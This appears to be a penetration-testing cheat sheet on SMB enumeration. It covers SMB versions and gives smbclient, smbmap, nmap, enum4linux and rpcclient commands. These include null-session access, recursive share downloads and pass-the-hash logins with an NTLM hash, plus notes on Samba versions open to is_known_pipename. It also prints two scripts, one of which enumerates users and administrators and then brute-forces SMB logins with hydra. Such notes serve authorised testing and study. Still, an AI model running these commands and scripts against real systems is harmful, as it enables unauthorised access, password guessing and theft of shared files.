SMB allows you to share your resources to other computers over the network,
There is 3 version of SMB,
SMB1 version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version
SMB2 reduced "chattiness" of SMB1. Guest access disabled by default
SMB3 guest access disabled, uses encryption. Most secure.
TCP port 139 is SMB over NetBios.
TCP port 445 is SMB over Ip. This is newer version of SMB
List of SMB versions and corresponding Windows versions:
SMB1 – Windows 2000, XP and Windows 2003.
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
Nmap Scanning
List Available Shares
smbclient
smbmap
Nmap
Connecting To Shares
Downloading multi files
Enum4Linux
Null session with rpcclient
Rpcclient is a Linux tool used for executing client-side MS-RPC functions. A null session is a connection with a samba or SMB server that does not require authentication with a password. Null sessions were enabled by default on legacy systems but have been disabled from Windows XP SP2 and Windows Server 2003. Nowadays it is not very common to encounter hosts that have null sessions enabled, but it is worth a try if you do stumble across one. The connection uses port 445.
Some important commands
Enumerating users with IPC$
if IPC$ share is enabled , and have anonymous access we can enumerate users through lookupsid.py
Google to see if version is vulnerable
smbver.sh
good script to use if none of scanner giving version for smb
You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , Session Setup Andx Response and there you will find smb version :)
smbclient -L \\\\192.168.1.101\\
# Will list all shares
smbclient -L \\$ip --option='client min protocol=NT1'
# if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
smbclient //HOST/PATH -c 'recurse;ls'
# List all files recursly
smbmap -H $ip
# Will list all shares with available permissions
smbmap -H $ip -R $sharename
# Recursively list dirs, and files
smbmap -u '' -p '' -H $ip
smbmap -u guest -p '' -H $ip
smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
# With credentials
nmap --script smb-enum-shares -p 139,445 $ip
smbclient \\\\192.168.1.101\\C$
or
smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1'
smbclient \\\\192.168.1.101\\admin$ -U t-skid
# Connect with valid username and password
# Specify username with -U
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
# With smbclient
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
# Downloads a file in quiet mode
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*'
# download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work
enum4linux -a $ip
enum4linux -u 'guest' -p '' -a $ip
rpcclient -U "" <ip>
# You will be asked for a password but leave it blank and press enter to continue.
SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename
SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""
#!/bin/bash
# smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal
# SECFORCE - Antonio Quina
# All credits to Bernardo Damele A. G. <bernardo.damele@gmail.com> for the ms08-067_check.py script
IFACE="eth0"
if [ $# -eq 0 ]
then
echo "Usage: $0 <IP>"
echo "eg: $0 10.10.10.10"
exit
else
IP="$1"
fi
echo -e "\n########## Getting Netbios name ##########"
nbtscan -v -h $IP
echo -e "\n########## Checking for NULL sessions ##########"
output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`
echo $output
echo -e "\n########## Enumerating domains ##########"
bash -c "echo 'enumdomains' | rpcclient $IP -U%"
echo -e "\n########## Enumerating password and lockout policies ##########"
polenum $IP
echo -e "\n########## Enumerating users ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP
bash -c "echo 'enumdomusers' | rpcclient $IP -U%"
bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt
echo -e "\n########## Enumerating Administrators ##########"
net rpc group members "Administrators" -I $IP -U%
echo -e "\n########## Enumerating Domain Admins ##########"
net rpc group members "Domain Admins" -I $IP -U%
echo -e "\n########## Enumerating groups ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP
echo -e "\n########## Enumerating shares ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP
echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
rm /tmp/$IP-users.txt
